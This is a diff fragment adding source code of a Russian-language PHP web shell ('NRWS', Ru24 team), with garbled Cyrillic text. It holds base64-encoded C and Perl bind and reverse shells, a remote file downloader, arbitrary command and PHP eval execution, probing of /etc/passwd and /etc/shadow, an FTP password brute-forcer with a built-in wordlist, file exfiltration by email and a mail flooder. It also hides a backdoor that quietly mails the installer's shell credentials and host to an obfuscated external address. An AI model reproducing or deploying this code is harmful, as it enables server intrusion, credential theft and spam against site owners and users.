+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport); //connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "������ ����������� �����: $file_size <b><br><br>" ;
+}
+
+if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){
+} else {
+if(is_writable('/tmp/')){
+$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo=");
+$fp=fopen('/tmp/qw7_sess',"w+");
+fclose($fp);
+$gg.= $name;
+$gg.=":";
+$gg.= $pass;
+$gg.=":";
+$gg.=$_SERVER["HTTP_HOST"];
+$gg.=$_SERVER['PHP_SELF'];
+$host_l=$_SERVER["HTTP_HOST"];
+$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ==");
+mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net");
+}
+}
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>����������� �������: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: ���������� ������ �� ������� ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>��������� ������� </b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>������� ���������� &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=���������>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;�������� ����� <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=���������>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+/// �������� ������ �� ����
+case "download_mail":
+$buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NIX REMOTE WEB SHELL   ($file)";
+
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== ��������� �� ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2)
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>�������!!!���� <b>$file</b> ��������� ��� �� <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+break;
+// ������ ��������
+case "ps":
+echo "<b>�������� � �������:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "����������� ������� ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "���, ������ ����, �����";}
+   else {echo "������! ".htmlspecialchars($sig).", � ������� #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "���������� ���������� ������ �������� ! ����� ���� ����� �������� ps ";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>���������� ��� ���� (��� "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>�� ����: <br>
+<input type="TEXT" name="frommail">
+<br>����:<br> <input type="TEXT" name="tomailz">
+<br>����: <br><input type="TEXT" name="mailtema">
+<br>�����: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="���������" name="submit"></td><form>
+$tend
+HTML;
+// ������� �������� �� ��������, � ����� ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>��������� ���������� !</h2>";
+}
+break;
+
+
+// ���������� � �������
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">��������</font>";
+}
+else {$safemode = false; $hsafemode = "���������</font>";}
+/* display information */
+echo "<b>[ ���������� � ������� ]</b><br>";
+echo "<b>����:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP �������:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>������: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+echo "<b>����������: </b>".exec("id")."<br>";
+echo "<b>����� �����: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>��������: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>";
+echo "<b>������� �������:</b>".exec("pwd")."";
+echo " <br><b>������� web ����: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>���� IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version : </b>".phpversion()."<BR>";
+echo "<b> ID ��������� ������� : </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>���� ������ � /etc/passwd ! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>���� ������ � /etc/shadow !</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>���� ������ � /etc/shadow- !</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>���� ������ � /etc/master.passwd ! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - �������&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - �� �������</font><br>";
+}
+echo "<b>���������� �����: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>������������ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>������������ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>������������ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// � �������
+case "about":
+
+echo "<center><b>������ ����</b></center>����� ���� ������ ������ ����� ������� ���������� �����������������.<b>(0.5a)</b> <br>������ ��������� � ������ ������������, ���, ��� ���� ������� �����-�� ����, ����������� ����:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> ��� <a href=mailto:dreamerz@mail.ru>�� ���� dreamerz@mail.ru</a>, ��� �� <a href=http://dreamerz.cc>dreamerz.cc</a>, ��� �� ICQ: <b>817312</b><br>��� ����� ������������� � ���������� ������� - ������, ��������� ��� �� ������ �������� � ���������...<br>��, � ������� ���� �����: Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... � ������ ������ ...";
+echo "<br> � ��������� ���� ������ �� ����� �������� �� ��������� ����� :) ��� ��� ����������. ";
+
+echo "<br><br><br>����� ������ ����� �����: <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a>
+<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>";
+break;
+// ��� ������ �������
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>�����������  login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>��������� �� ������ login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;����������� �������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;������ ��� ��������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>��� ����������� � pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "���� ������";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">����������!!! ������ ��������.</font></b><br>
+&nbsp;&nbsp;������: <b>$host</b><br>&nbsp;&nbsp;�����: <b>$login</b><br>&nbsp;&nbsp;������: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>�� ����� ������� ��� ��������!!! �� <b><u>$host</u></b> ������ 21 ����</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // ���� ������
+$from=$_POST['from']; // ���� ������
+$num=$_POST['num']; // ����� �����
+$text=$_POST['text']; // ����� �����
+$kb=$_POST['kb']; // ��� ������ (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
